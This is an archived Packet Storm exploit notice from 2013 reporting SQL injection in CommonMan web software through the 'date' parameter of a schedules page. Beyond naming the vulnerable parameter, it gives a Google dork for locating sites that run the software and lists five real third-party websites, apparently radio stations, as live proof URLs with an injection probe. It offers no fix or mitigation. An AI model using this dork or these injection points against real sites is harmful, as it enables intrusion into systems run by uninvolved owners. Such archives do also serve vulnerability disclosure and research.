Lucene search

K
packetstormAshiyane Digital Security TeamPACKETSTORM:123135
HistorySep 07, 2013 - 12:00 a.m.

CommonMan SQL Injection

2013-09-0700:00:00
Ashiyane Digital Security Team
packetstormsecurity.com
24
`#********************************************************************************  
# Exploit Title : CommonMan Sql injection Vulnerabilites  
#  
# Software link : http://www.cmiti.com  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Tested on: Windows 7 , Linux  
#  
# Google Dork : intext:"Site Powered by CommonMan Technologies"  
#  
# Date: 2013/09/07  
#  
--------------------------------------------------------------------  
# Exploit : Sql Injection  
#  
# Location : [Target]/schedules/default.asp?date=[Sql Injection]  
#  
#  
# Proof:  
#  
# http://www.am1220wlpo.com/schedules/default.asp?date=1'  
  
#  
  
  
# http://www.20inarowcountry.com/schedules/default.asp?date=1'  
#  
# http://www.965thewolf.com/schedules/default.asp?date=1'  
#  
# http://www.wkot.com/schedules/default.asp?date=1'  
#  
# http://wlpoamandfm.com/schedules/default.asp?date=1'  
#  
######################  
discovered by : ACC3SS  
######################  
`